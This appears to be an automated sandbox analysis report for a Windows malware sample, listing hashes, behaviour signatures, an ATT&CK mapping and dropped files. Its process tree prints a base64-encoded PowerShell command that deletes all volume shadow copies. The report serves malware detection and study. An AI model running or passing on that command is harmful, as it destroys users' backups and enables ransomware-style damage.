Analysis

  • max time kernel
    124s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    13-06-2024 03:56

General

  • Target

    a3c0870cf6e4ca6e43d78a64e6b87c5c_JaffaCakes118.exe

  • Size

    142KB

  • MD5

    a3c0870cf6e4ca6e43d78a64e6b87c5c

  • SHA1

    5704e05575d026a1c87d1496a9c63d5979ad9e39

  • SHA256

    291dd0928569306e54b7ff9fc217bf704d646960fe1ec25a7cc431e4af6874e4

  • SHA512

    d31745d4deb5a89aa5ef8c6d46a73738dbead525072c20cc55e5e25d7f1a22de031f26925942209c4b6f3f48414df57fcc169c1b61fde2119bb2c8fca7d7eb18

  • SSDEEP

    3072:DJMawtnGqtWoKeZC62aoNUSFcsCDFgfBS:3w9vteQJYUGcPO

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a3c0870cf6e4ca6e43d78a64e6b87c5c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a3c0870cf6e4ca6e43d78a64e6b87c5c_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2160
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2120
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2516

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    3
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      c27009cf37df3d539e9e270da64e301e

      SHA1

      9e686a2dad4034b75890e485ad8a9aca11748868

      SHA256

      ffa9ee37dbbbe5e1af2e03cf138e652f293085dc70bdc263f017ede0b34e9643

      SHA512

      f5ffbbd0211194aa27c29e021d431bea08be5995198bb1bba3f9e77a02bad48e00f6768a1d88a7d07b9524900cb46e544bab9b275e108bbb4f7c9670e1ff973d

    • C:\Users\Admin\AppData\Local\Temp\Tar5873.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\u85433nb97-CHECK.txt
      Filesize

      4KB

      MD5

      7dabdbc8f9481b87cc0ba06161979caa

      SHA1

      960bdd571be055da60db83cf70f46958f093f228

      SHA256

      a068f4dffb6bd8f4fee749fd4635abdca97f7e191d0ae1ea0bb4fbccf3a22294

      SHA512

      72015fc5887f5ef4310b49441c930550a090133a2de2f16e0d5b01db25d3515c4c69a3a692b42fd9de619e164ce9a6a6029bab5e0926e3a9d229ef376e9c5814

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      192KB

      MD5

      4e08fa82531f6dff439c41b39eb29045

      SHA1

      9248ba7bc405d7c0eb40ed03066277bd4b649062

      SHA256

      e472edc3a977d516b4d9d78f30b71fd915d077bd1a709d26ed79cedfe57ee218

      SHA512

      43f55295e5e20bb3dc049dd24795af04e74e46c41320c7c0b54385babfebcaf3c004a61e7c3132e21dc96b3e871ff94026e6ae83e827e4cba78328ce51668b8d

    • memory/2156-10-0x0000000000260000-0x0000000000266000-memory.dmp
      Filesize

      24KB

    • memory/2156-5-0x00000000021E0000-0x000000000227F000-memory.dmp
      Filesize

      636KB

    • memory/2156-4-0x0000000000250000-0x0000000000251000-memory.dmp
      Filesize

      4KB

    • memory/2156-3-0x0000000000190000-0x0000000000191000-memory.dmp
      Filesize

      4KB

    • memory/2156-2-0x0000000000180000-0x0000000000181000-memory.dmp
      Filesize

      4KB

    • memory/2156-0-0x0000000000170000-0x000000000017A000-memory.dmp
      Filesize

      40KB

    • memory/2156-7-0x00000000002D0000-0x00000000002EF000-memory.dmp
      Filesize

      124KB

    • memory/2156-9-0x0000000000260000-0x0000000000266000-memory.dmp
      Filesize

      24KB

    • memory/2156-8-0x00000000025E0000-0x00000000026E9000-memory.dmp
      Filesize

      1.0MB

    • memory/2156-6-0x0000000002280000-0x00000000023AD000-memory.dmp
      Filesize

      1.2MB

    • memory/2156-1-0x0000000002110000-0x00000000021D9000-memory.dmp
      Filesize

      804KB

    • memory/2156-22-0x0000000000250000-0x0000000000251000-memory.dmp
      Filesize

      4KB

    • memory/2160-21-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
      Filesize

      9.6MB

    • memory/2160-20-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
      Filesize

      9.6MB

    • memory/2160-19-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
      Filesize

      9.6MB

    • memory/2160-18-0x0000000002400000-0x0000000002408000-memory.dmp
      Filesize

      32KB

    • memory/2160-17-0x000000001B710000-0x000000001B9F2000-memory.dmp
      Filesize

      2.9MB

    • memory/2160-16-0x000007FEF622E000-0x000007FEF622F000-memory.dmp
      Filesize

      4KB